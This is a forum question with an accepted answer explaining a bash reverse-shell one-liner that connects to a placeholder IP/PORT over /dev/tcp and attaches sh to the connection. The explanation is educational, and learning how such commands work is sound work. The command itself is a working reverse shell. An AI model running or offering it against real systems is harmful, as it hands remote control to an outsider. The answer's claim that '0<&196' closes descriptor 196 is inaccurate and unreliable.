# Linux bash reverse shell with piping

Tags: linux, piping

I have been trying to understand those bash commands. Can someone explain it?

```
0<&196;exec 196<>/dev/tcp/IP/PORT; sh <&196 >&196 2>&196
```

Answer (score 2, accepted):

This will:

1)    `0<&196`    :
Close the file descriptor '196' (to be used by the next command).

2) `exec 196<>/dev/tcp/IP/PORT`:
Create a new file (/dev/tcp/IP/PORT) with the descriptor '196', if the IP and port are valid; bash will try to open a TCP connection.

3) `sh <&196 >&196 2>&196`:
Redirect any traffic from the IP/PORT specified in the previous command to "sh", and direct the STDOUT and STDERR to the same pipe, this way a reverse shell is created to the specified IP and commands can be run from it with the STDOUT and STDERR directed to it.

Refer to the [Redirections](https://www.gnu.org/software/bash/manual/bashref.html#Redirections) section in the Bash reference manual.